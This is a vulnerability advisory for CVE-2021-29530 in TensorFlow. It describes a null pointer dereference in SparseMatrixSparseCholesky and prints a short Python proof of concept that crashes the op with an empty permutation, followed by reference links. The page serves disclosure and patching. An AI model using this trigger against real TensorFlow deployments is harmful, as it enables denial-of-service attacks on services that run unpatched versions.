CVE-2021-29530: Invalid validation in `SparseMatrixSparseCholesky`
(updated )
An attacker can trigger a null pointer dereference by providing an invalid permutation
to tf.raw_ops.SparseMatrixSparseCholesky
:
import tensorflow as tf
import numpy as np
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops
indices_array = np.array([[0, 0]])
value_array = np.array([-10.0], dtype=np.float32)
dense_shape = [1, 1]
st = tf.SparseTensor(indices_array, value_array, dense_shape)
input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
st.indices, st.values, st.dense_shape)
permutation = tf.constant([], shape=[1, 0], dtype=tf.int32)
tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)
References
- github.com/advisories/GHSA-xcwj-wfcm-m23c
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-458.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-656.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-167.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/e6a7c7cc18c3aaad1ae0872cb0a959f5c923d2bd
- github.com/tensorflow/tensorflow/security/advisories/GHSA-xcwj-wfcm-m23c
- nvd.nist.gov/vuln/detail/CVE-2021-29530
Detect and mitigate CVE-2021-29530 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →